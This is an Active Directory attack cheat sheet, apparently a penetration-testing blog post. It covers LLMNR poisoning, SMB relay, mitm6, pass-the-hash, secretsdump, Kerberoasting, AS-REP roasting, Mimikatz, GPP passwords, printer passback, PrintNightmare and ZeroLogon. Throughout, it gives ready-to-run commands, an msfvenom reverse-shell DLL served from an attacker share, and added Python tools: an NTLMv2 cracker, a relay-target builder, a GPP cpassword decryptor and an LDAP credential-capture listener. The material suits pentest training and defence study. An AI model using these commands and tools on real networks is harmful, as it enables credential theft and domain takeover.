Attacking Active Directory Jutsus


Attacking Active Directory

1. LLMNR Poisoning

responder -I eth0
responder -I eth0 -rdw -v (old version flags)
apt install responder (reinstall if Responder is missing or misbehaves)

Run responder when you first get on the network. Keep it on the entire time.

What is LLMNR? (Link-Local Multicast Name Resolution)

  1. Used to resolve host names when DNS fails to do so.
  2. Successor to NBT-NS; both are still enabled by default on Windows.
  3. Key flaw: any host on the local link can answer the query, and the victim then authenticates to whoever answered with the user's username and an NTLMv2 challenge/response.

How the attack works: a user requests a share that doesn't exist, such as \\documents. DNS doesn't know what that is, so the victim multicasts an LLMNR query asking the rest of the subnet. Our attack box answers "YES, that's me!", the victim connects and authenticates to us, and we receive the username and the NTLMv2 response.

What the victim hands over is an NTLMv2 challenge/response ("net-NTLMv2"), not the NT hash itself: it can be cracked offline or relayed (section 2), but it cannot be passed the way a SAM hash can (section 7).
Copy the captured line into a file (pparker.txt here) and crack it with hashcat:
hashcat -m 5600 pparker.txt /usr/share/wordlists/rockyou.txt
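Added example (not from the original post): what the "hash" Responder captures actually is and what hashcat -m 5600 does with it. The script computes the NT hash and the NTLMv2 proof the way the victim does, builds a Responder-style line for a constructed capture (the server challenge, blob, user pparker, domain VULCAN and the password are assumed sample values), and then verifies candidate passwords against that line. MD4 is implemented in pure Python because hashlib often lacks it under OpenSSL 3.

```python
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib's md4 is often unavailable under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    k = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (k, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for func, const, shifts, order in rounds:
            for i, j in enumerate(order):
                t = (a + func(b, c, d) + x[j] + const) & _MASK
                a, b, c, d = d, _rotl(t, shifts[i % 4]), b, c
        h = [(u + v) & _MASK for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). This is what hashcat -m 1000 cracks and pass-the-hash uses."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr as the victim computes it (MS-NLMP 3.3.2): HMAC-MD5 keyed by the NTLMv2 hash
    (itself HMAC-MD5 of UPPER(user)+domain keyed by the NT hash) over server challenge + client blob."""
    ntlmv2_key = hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, hashlib.md5).digest()


def responder_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """The user::domain:challenge:NTProofStr:blob line Responder logs, i.e. hashcat -m 5600 input."""
    proof = ntlmv2_proof(nt_hash(password), user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def check_password(line: str, candidate: str) -> bool:
    """One hashcat -m 5600 guess: recompute NTProofStr from the candidate and compare.
    The server challenge and blob are in the capture, so cracking needs nothing else."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.strip().split(":", 5)
    proof = ntlmv2_proof(nt_hash(candidate), user, domain,
                         bytes.fromhex(chal_hex), bytes.fromhex(blob_hex))
    return hmac.compare_digest(proof, bytes.fromhex(proof_hex))


# Constructed sample capture (not from the page): a fixed server challenge and a minimal
# NTLMv2_CLIENT_CHALLENGE blob (RespType/HiRespType 1,1; timestamp; client nonce; one AV pair).
_SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
_BLOB = (bytes.fromhex("0101000000000000")                         # RespType, HiRespType, reserved
         + bytes.fromhex("00d2a5a0c6b9d901")                        # FILETIME timestamp
         + bytes.fromhex("8899aabbccddeeff")                        # ClientChallenge (8 random bytes)
         + b"\x00" * 4                                              # reserved
         + b"\x02\x00\x0c\x00" + "VULCAN".encode("utf-16le")        # AvPair: MsvAvNbDomainName
         + b"\x00" * 4                                              # AvPair: MsvAvEOL
         + b"\x00" * 4)                                             # reserved
SAMPLE_LINE = responder_line("pparker", "VULCAN", "password", _SERVER_CHALLENGE, _BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)                                  # what you would paste into pparker.txt
    for guess in ("Welcome1", "password"):              # a two-word "wordlist"
        print(f"{guess:10} -> {check_password(SAMPLE_LINE, guess)}")
```

Run it to see the line you would paste into pparker.txt. The NT hash it derives on the way is the value -m 1000 cracks in section 6, which is also why a captured NTLMv2 response cannot be turned into a pass-the-hash value: the NT hash only falls out if the password is guessed.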

Video: https://www.youtube.com/watch?v=6jvGK5jld-I

2. SMB Relay Attack

What is SMB Relay?
- Instead of cracking the NTLMv2 responses Responder captures, we relay them to other machines where the same user has rights and authenticate there as that user.

Requirements

  1. SMB signing must be disabled or not required on the target. Workstations don't require it by default; domain controllers do, so they are not relay targets.
  2. The relayed user must be a local admin on the target for ntlmrelayx to dump its SAM or give you a shell.
sudo nmap 192.168.200.* -p 445 --script smb2-security-mode
1. Edit Responder.conf and set SMB = Off and HTTP = Off, so Responder only poisons and ntlmrelayx is the one that receives the connections.
vim /usr/share/responder/Responder.conf
2. Put the hosts nmap reports as "Message signing enabled but not required" into targets.txt, one IP per line.
3. Run responder and impacket-ntlmrelayx at the same time.
sudo responder -I eth0 -v
sudo impacket-ntlmrelayx -tf targets.txt -smb2support (dumps the SAM of each target) - OR -
sudo impacket-ntlmrelayx -tf targets.txt -smb2support -i (interactive SMB shell; connect with nc to the 127.0.0.1 port it prints, 11000 for the first session)
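Added example (not the page's own code): a small parser that turns nmap's smb2-security-mode output into targets.txt so the "not required" hosts don't have to be picked out by hand. The nmap text below is constructed to look like -oN output for three assumed hosts; the two status strings are the ones the NSE script prints for required and not-required signing.

```python
import re

# Constructed nmap -oN style output (not from the page) for three assumed hosts.
SAMPLE_NMAP = """\
Nmap scan report for dc01.vulcan.local (192.168.200.191)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 192.168.200.203
Host is up (0.0011s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.200.215
Host is up (0.0012s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds
"""

# "Nmap scan report for host (ip)" or "Nmap scan report for ip"
_HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?", re.M)
_SIGN_RE = re.compile(r"Message signing[^\n]*", re.I)


def signing_status(nmap_text: str) -> dict:
    """Map each scanned IP to its smb2-security-mode signing line (None if the script printed nothing)."""
    result = {}
    chunks = re.split(r"(?=^Nmap scan report for )", nmap_text, flags=re.M)   # one chunk per host
    for chunk in chunks:
        m = _HOST_RE.match(chunk)
        if not m:
            continue
        s = _SIGN_RE.search(chunk)
        result[m.group(1)] = s.group(0).strip() if s else None
    return result


def relay_targets(nmap_text: str) -> list:
    """IPs where signing is not enforced: 'not required' or 'disabled' means the relay will be accepted."""
    targets = []
    for ip, status in signing_status(nmap_text).items():
        if status and ("not required" in status.lower() or "disabled" in status.lower()):
            targets.append(ip)
    return targets


def write_targets(nmap_text: str, path: str = "targets.txt") -> int:
    """Write the relayable hosts one per line (the -tf file) and return how many there were."""
    targets = relay_targets(nmap_text)
    with open(path, "w") as fh:
        fh.write("\n".join(targets) + ("\n" if targets else ""))
    return len(targets)


if __name__ == "__main__":
    for ip, status in signing_status(SAMPLE_NMAP).items():
        print(f"{ip:16} {status or 'no smb2-security-mode result'}")
    print("relay targets:", relay_targets(SAMPLE_NMAP))
```

Feed it the saved scan (nmap ... -oN scan.txt) and the DC drops out on its own because it requires signing; what is left is the workstations and member servers.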

3. IPv6 DNS Poisoning Attack

Windows prefers IPv6 over IPv4 and sends a DHCPv6 solicit when it boots and again periodically (roughly every 30 minutes). By default no DHCPv6 server exists on most networks, so our attack box answers "I AM THE DNS!!", hands the host an IPv6 address and becomes its DNS server. mitm6 then answers the wpad lookup with our IP, ntlmrelayx serves a fake WPAD file (-wh), the client authenticates to that "proxy", and the authentication is relayed to LDAPS on the domain controller.

Run both commands at the same time.

sudo python3 mitm6.py -d vulcan.local
sudo impacket-ntlmrelayx -6 -t ldaps://192.168.200.191 -wh fakewpadd.vulcan.local -l lootme3
-- After Exploit (if the relayed account was privileged, ntlmrelayx creates a new domain user with replication rights, the wQcIvVulBe account below; -l writes the domain dump to the lootme3 folder) --
sudo impacket-secretsdump -dc-ip 192.168.200.191 'VULCAN.local/wQcIvVulBe:IHXIVi48Q6)*+$#'@192.168.200.191
sudo impacket-secretsdump -dc-ip 192.168.200.191 -hashes aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca 'VULCAN.local/Administrator'@192.168.200.191 -just-dc

If you are on tun0 (VPN), patch mitm6.py as described in https://github.com/dirkjanm/mitm6/issues/16. Install is easy: clone it into /opt and run pip3 install -r requirements.txt.

Only have a hash? That works too: secretsdump takes -hashes LM:NT instead of a password (second command above).

_____

4. Pass the Password

crackmapexec smb 192.168.200.0/24 -u administrator -d VULCAN.local -p 'password123!'
impacket-psexec 'VULCAN.local/administrator:password123!'@192.168.200.191
impacket-smbexec 'VULCAN.local/administrator:password123!'@192.168.200.191
impacket-wmiexec 'VULCAN.local/administrator:password123!'@192.168.200.191

crackmapexec sprays the credential across the whole subnet and tags hosts where it is local admin with (Pwn3d!). If psexec then fails on such a host, Windows Defender/antivirus is most likely blocking the uploaded service binary; smbexec and wmiexec don't drop a binary and often still work.

5. Dump SAM Hashes with SecretsDump

Against a domain controller the first form dumps SAM, LSA secrets and NTDS; -just-dc pulls only NTDS (every domain account's NT hash plus Kerberos keys) over DRSUAPI, which needs domain admin or replication rights. In the output lines user:rid:lmhash:nthash::: the LM half aad3b435b51404eeaad3b435b51404ee is the empty LM hash; the NT half is the one you crack or pass.
sudo impacket-secretsdump -dc-ip 192.168.200.191 'VULCAN.local/wQcIvVulBe:IHXIVi48Q6)*+$#'@192.168.200.191
sudo impacket-secretsdump -dc-ip 192.168.200.191 -hashes aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca 'VULCAN.local/Administrator'@192.168.200.191 -just-dc

Screenshots at end of Section 3

6. Hashcat for NTLM Hashes

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt (NT hashes from SAM/NTDS: feed the 32-hex NT half, not the LM:NT pair)
hashcat -m 5600 pparker.txt /usr/share/wordlists/rockyou.txt (NTLMv2 challenge/responses captured by Responder)

7. Pass the Hash

crackmapexec smb 192.168.200.0/24 -u "Administrator" -H aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca
crackmapexec smb 192.168.200.0/24 -u "Administrator" -H aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca --local-auth (local SAM account instead of a domain account)
impacket-psexec 'VULCAN.local/annieh'@192.168.200.203 -hashes aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca
impacket-psexec 'Administrator'@192.168.200.203 -hashes aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca

Pass-the-hash needs the NT hash from SAM/NTDS (sections 5 and 11); the NTLMv2 responses Responder captures cannot be passed, only cracked or relayed. The LM half can be the empty aad3b435b51404eeaad3b435b51404ee value since only the NT half is used, and the account still has to be a local admin on the target.

8. Token Impersonation

load incognito (from a meterpreter session; type help for the commands. Seeing other users' tokens needs SYSTEM or an elevated admin session.)
list_tokens -u (user tokens; -g for group tokens)
impersonate_token vulcan\\Administrator (the double backslash is required in meterpreter)
rev2self (drop back to your original token)

Token Impersonation

Tokens: temporary keys that let you act as a user on a system without re-entering the password, like cookies for computers.

Two types of tokens:

Delegate - created by interactive logons (console or Remote Desktop); can be used to authenticate to other machines as that user.
Impersonate - created by "non-interactive" logons such as mapping a network drive or running a domain logon script; usable only on the local machine.

9. Kerberoasting

Goal: get a TGS (Ticket Granting Service ticket) for a service account from the Domain Controller. Part of the TGS is encrypted with the service account's password hash, so we can crack that password offline with hashcat. Sometimes service accounts (accounts with an SPN, such as SQLService) are also Domain Admins: get the TGS of SQLService, crack the password to "password123!", and log in to the domain controller with it. Any authenticated domain user can request a TGS for any SPN, so all this needs is one valid account.

GetUserSPNs.py 'vulcan.local/annieh:password123!' -dc-ip 192.168.200.215 -request
hashcat -m 13100 krb5tgs.txt /usr/share/wordlists/rockyou.txt (RC4 tickets, $krb5tgs$23$; AES tickets come back as $krb5tgs$17$ / $krb5tgs$18$ and need -m 19600 / 19700)
  1. Request a Ticket Granting Ticket (TGT): the pre-authentication timestamp is encrypted with the user's key (the NT hash for RC4), which proves the password to the DC.
  2. The DC sends back a TGT encrypted with the krbtgt account's hash.
  3. Request a TGS for the service's SPN, presenting the TGT you now have.
  4. Receive a TGS encrypted with the service account's hash.
  5. Crack that offline with hashcat. Nothing touches the service itself, and the DC only sees a normal ticket request (event 4769).

10. AS-REP Roasting

Accounts with "Do not require Kerberos preauthentication" set hand out an AS-REP encrypted with the user's own hash to anyone who asks for it by name, so no password is needed, only a list of usernames. users.txt holds rpcclient enumdomusers output (lines like user:[annieh] rid:[0x45b]); the awk pulls the name between the first pair of brackets, and the loop tries each user u. GetNPUsers.py also takes -usersfile roastUsers.txt -format hashcat to do the whole list in one run. The output cracks with hashcat -m 18200.

awk -F '[][]' '{ print $2 }' users.txt > roastUsers.txt
for u in $(cat roastUsers.txt); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb.local/$u@10.10.10.161; done

11. Mimikatz

Used to view and steal credentials and to forge Kerberos tickets: it dumps creds from LSASS memory and does Pass-The-Ticket, Golden Ticket and Silver Ticket attacks. Needs local admin (SeDebugPrivilege) on the box.

C:\Users\Public\Documents>mimikatz.exe
mimikatz.exe
The system cannot execute the specified program.

Get this error? Windows Defender is on and has blocked or quarantined the binary.

privilege::debug (required before touching LSASS)
sekurlsa::logonpasswords (credentials of currently logged-on users, from LSASS memory)
lsadump::sam OR lsadump::sam /patch (local SAM hashes; /patch sometimes doesn't work)
lsadump::lsa /patch (LSA secrets and, on a DC, the domain hashes; good 2nd pick)

The NTLM line sekurlsa prints is the NT hash and cracks with hashcat -m 1000. The SHA1 line is SHA-1 of the UTF-16LE password, a stand-alone value, and can be cracked with hashcat -m 170 sha1.txt /usr/share/wordlists/rockyou.txt too.

12. GPP Group Policy Preferences MS14-025

Group Policy Preferences let admins push local accounts and their passwords through policy. The password is stored in a cpassword attribute in XML files under SYSVOL (Groups.xml, Services.xml, ScheduledTasks.xml, Drives.xml), AES-256 encrypted, but Microsoft published the key in its own documentation, so anyone who can read SYSVOL (every domain user) can decrypt it. MS14-025 stopped Windows from creating new cpassword entries; it did not remove existing ones, so old XML files in SYSVOL stay decryptable on patched servers too. Windows Server 2012 and earlier are the usual place to find them.

Once you get username:password, try it with crackmapexec; if a direct login fails, use the creds for kerberoasting or secretsdump instead.

msf> auxiliary/scanner/smb/smb_enum_gpp
msf> post/windows/gather/credentials/gpp
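Added example (not the page's own code and not one of the Metasploit modules above): decrypting a cpassword with the published key, and pulling every cpassword out of a preference XML file. It assumes the cryptography package is installed. The Groups.xml below is constructed; its cpassword is a widely published sample value and the account name is made up.

```python
import base64
import xml.etree.ElementTree as ET
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# The 32-byte AES-256 key Microsoft published in the MS-GPPREF documentation (section 2.2.1.1.4).
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def decrypt_cpassword(cpassword: str) -> str:
    """cpassword is base64 (with the '=' padding stripped) of AES-256-CBC ciphertext under a zero IV
    with PKCS#7 padding; the plaintext is the password in UTF-16LE."""
    data = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    dec = Cipher(algorithms.AES(GPP_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    plain = dec.update(data) + dec.finalize()
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: not a GPP cpassword value")
    return plain[:-pad].decode("utf-16le")


def find_gpp_creds(xml_text: str) -> list:
    """Walk a preference XML file (Groups.xml, Services.xml, ScheduledTasks.xml, Drives.xml,
    DataSources.xml) and return (account, password) for every element carrying a cpassword.
    The account attribute differs per file type, hence the chain of names."""
    found = []
    for el in ET.fromstring(xml_text).iter():
        cpw = el.attrib.get("cpassword")
        if not cpw:
            continue
        account = (el.attrib.get("userName") or el.attrib.get("accountName")
                   or el.attrib.get("runAs") or el.attrib.get("username") or "?")
        found.append((account, decrypt_cpassword(cpw)))
    return found


# Constructed Groups.xml (not from the page). The cpassword is a widely published sample value;
# the account name is made up.
SAMPLE_GROUPS_XML = r"""<Groups>
  <User name="svc_backup" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description="" noChange="1" neverExpires="1"
      acctDisabled="0" userName="VULCAN\svc_backup"
      cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    # Real files live under \\<dc>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\<type>\<type>.xml
    for account, password in find_gpp_creds(SAMPLE_GROUPS_XML):
        print(f"{account}:{password}")
```

Point find_gpp_creds at every Preferences XML you can pull from SYSVOL with smbclient; a padding error from decrypt_cpassword means the value was not a GPP cpassword at all.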

13. Passback Attack

Printers and other appliances often store an LDAP account for address-book lookups. The web UI shows the stored password only as ****, but the address of the LDAP server is editable: point it at your own IP, start a netcat listener on port 389, and trigger a lookup (or "test connection"). The printer then binds to you with a simple bind, and the bind DN and password arrive in cleartext.

https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack
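Added example (not from the post or the linked article): a listener that replaces netcat and decodes the LDAP simple bind the printer sends, plus an encoder for the same message so the parser can be exercised offline. It assumes the printer is configured for plain LDAP on port 389 with a simple bind; if it is set to LDAPS or StartTLS this listener only sees a TLS ClientHello and a TLS-terminating listener would be needed instead. The DN and password in the sample are made up.

```python
import socket


def _tlv(tag: int, body: bytes) -> bytes:
    """BER TLV with the short or two-byte long length form (enough for any bind request)."""
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    elif n < 0x100:
        length = b"\x81" + bytes([n])
    else:
        length = b"\x82" + n.to_bytes(2, "big")
    return bytes([tag]) + length + body


def encode_simple_bind(dn: str, password: str, msg_id: int = 1) -> bytes:
    """LDAPMessage { messageID, BindRequest { version 3, name, simple [0] password } },
    exactly what a client sends for a simple bind (msg_id kept below 128 for a 1-byte INTEGER)."""
    bind = _tlv(0x60, _tlv(0x02, b"\x03") + _tlv(0x04, dn.encode()) + _tlv(0x80, password.encode()))
    return _tlv(0x30, _tlv(0x02, bytes([msg_id])) + bind)


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the TLV) for the BER element at buf[pos]."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                                  # long form: low bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_simple_bind(buf: bytes):
    """Pull (dn, password) out of a simple BindRequest; None if the bytes are something else
    (a SASL bind, tag 0xA3, or a TLS ClientHello because the printer wanted LDAPS)."""
    try:
        tag, msg, _ = _read_tlv(buf, 0)
        if tag != 0x30:                                 # LDAPMessage SEQUENCE
            return None
        _, _msg_id, pos = _read_tlv(msg, 0)            # messageID INTEGER
        tag, bind, _ = _read_tlv(msg, pos)
        if tag != 0x60:                                 # [APPLICATION 0] BindRequest
            return None
        _, _version, pos = _read_tlv(bind, 0)          # version INTEGER
        _, dn, pos = _read_tlv(bind, pos)              # name LDAPDN
        tag, cred, _ = _read_tlv(bind, pos)
        if tag != 0x80:                                 # [0] simple OCTET STRING
            return None
        return dn.decode(errors="replace"), cred.decode(errors="replace")
    except IndexError:
        return None


def listen_for_bind(port: int = 389, timeout: float = 300.0):
    """Netcat replacement: listen on the port the printer's LDAP server field now points at,
    take the first connection and decode its bind. Returns (peer_ip, (dn, password) or None)."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        srv.settimeout(timeout)
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(4096)
    return peer[0], parse_simple_bind(data)


# Constructed sample (made-up DN and password), encoded the way a printer would send it.
SAMPLE_BIND = encode_simple_bind("cn=ldapsvc,cn=Users,dc=vulcan,dc=local", "Printer123!")

if __name__ == "__main__":
    print(SAMPLE_BIND.hex())
    print(parse_simple_bind(SAMPLE_BIND))
    # Live use (needs root for port 389): print(listen_for_bind())
```

With netcat you would see the same bytes raw; the password is still readable in the dump because a simple bind carries it as a plain OCTET STRING, which is the whole reason the attack works.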

14. PrintNightmare Attack

rpcdump.py 192.168.200.221 | egrep 'MS-RPRN|MS-PAR' (if both interfaces are listed, the Print Spooler is reachable over RPC and the host may be vulnerable; this does not prove it is unpatched)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.187 lport=5555 -f dll > shell.dll
smbserver.py Share . -smb2support

python3 CVE-2021-1675.py 'jessica:password123='@192.168.200.221 '\\192.168.200.187\Share\shell.dll'
python3 CVE-2021-1675.py 'vulcan.local/annieh':'password123='@192.168.200.221 '\\192.168.200.187\Share\shell.dll'

The domain-user form hasn't worked for me with this exploit; it could work on another box. GitHub: https://github.com/cube0x0/CVE-2021-1675 OR https://github.com/ly4k/PrintNightmare

15. ZeroLogon Attack

CVE-2020-1472. Sets the domain controller's machine account password to an empty string, not the Administrator password: Netlogon's AES-CFB8 uses a fixed all-zero IV, so an unauthenticated client can pass the challenge by brute force (1 in 256 odds per attempt, so a few thousand tries). With the empty machine password you can DCSync as the DC's own account. Be careful and use as a last resort: the DC's stored password no longer matches AD, which breaks replication and Netlogon until it is restored. The check script alone is usually enough evidence.

https://github.com/SecuraBV/CVE-2020-1472
https://github.com/dirkjanm/CVE-2020-1472

ZeroLogon CVE-2020-1472
# Check Only (changes nothing on the DC)
python3 zerologon_tester.py SPOCK-DC 192.168.200.136
# Exploit (sets the SPOCK-DC$ machine password to empty)
python cve-2020-1472-exploit.py SPOCK-DC 192.168.200.136
impacket-secretsdump -just-dc -no-pass 'VULCAN/SPOCK-DC$'@192.168.200.136

# Restore (do this immediately after the dump, with an admin hash from it)
impacket-secretsdump administrator@192.168.200.136 -hashes aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca
Look for $MACHINE.ACC: plain_password_hex in the LSA secrets part of the output
python restorepassword.py VULCAN/SPOCK-DC@SPOCK-DC -target-ip 192.168.200.136 -hexpass
(everything after plain_password_hex)
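Added example (not from the page or the linked repositories) showing the arithmetic the check and exploit scripts rely on. Netlogon derives the client credential with AES-CFB8 under a fixed all-zero IV; when the first byte of AES_k(0^16) is zero, an all-zero 8-byte challenge encrypts to an all-zero credential, which happens for about 1 in 256 session keys. It assumes the cryptography package; the session keys are generated locally and nothing talks to a DC.

```python
import random
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes


def aes_cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """AES-CFB8 done by hand: one AES block encryption per plaintext byte, only the first
    keystream byte is used, and the ciphertext byte is shifted into the register."""
    ecb = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    shift = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream = ecb.update(bytes(shift))
        c = p ^ keystream[0]
        out.append(c)
        shift = shift[1:] + bytes([c])
    return bytes(out)


def matches_library_cfb8(key: bytes, iv: bytes, data: bytes) -> bool:
    """Sanity check of the hand-rolled CFB8 against the library's CFB8 mode."""
    ref = Cipher(algorithms.AES(key), modes.CFB8(iv)).encryptor()
    return aes_cfb8_encrypt(key, iv, data) == ref.update(data) + ref.finalize()


def netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """ComputeNetlogonCredential (MS-NRPC 3.1.4.4.1) with AES: CFB8 over the 8-byte challenge
    using a fixed all-zero IV. The zero IV is the bug."""
    return aes_cfb8_encrypt(session_key, b"\x00" * 16, challenge)


def find_weak_key(start: int = 0) -> bytes:
    """Deterministically find a key for which AES_k(0^16) starts with a zero byte. With a zero IV
    and a zero challenge byte, that zero byte is shifted in and the register never changes,
    so every output byte is zero: the credential for challenge 00..00 is 00..00."""
    i = start
    while True:
        key = i.to_bytes(16, "big")
        first = Cipher(algorithms.AES(key), modes.ECB()).encryptor().update(b"\x00" * 16)[0]
        if first == 0:
            return key
        i += 1


def zero_credential_probability(trials: int = 8192, seed: int = 1) -> float:
    """Fraction of random session keys for which the all-zero challenge gives an all-zero
    credential. Expect about 1/256; the exploit simply retries until the DC picks such a key."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        key = rng.getrandbits(128).to_bytes(16, "big")
        if netlogon_credential(key, b"\x00" * 8) == b"\x00" * 8:
            hits += 1
    return hits / trials


if __name__ == "__main__":
    k = find_weak_key()
    print("weak key:", k.hex(), "credential:", netlogon_credential(k, b"\x00" * 8).hex())
    print(f"P(zero credential) ~ {zero_credential_probability():.4f} (1/256 = {1/256:.4f})")
```

The attacker never learns the session key; it just sends the all-zero client challenge and all-zero credential repeatedly until the DC happens to derive a key where the first keystream byte is zero, which is what the 2000-attempt loop in the tester does over the network.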
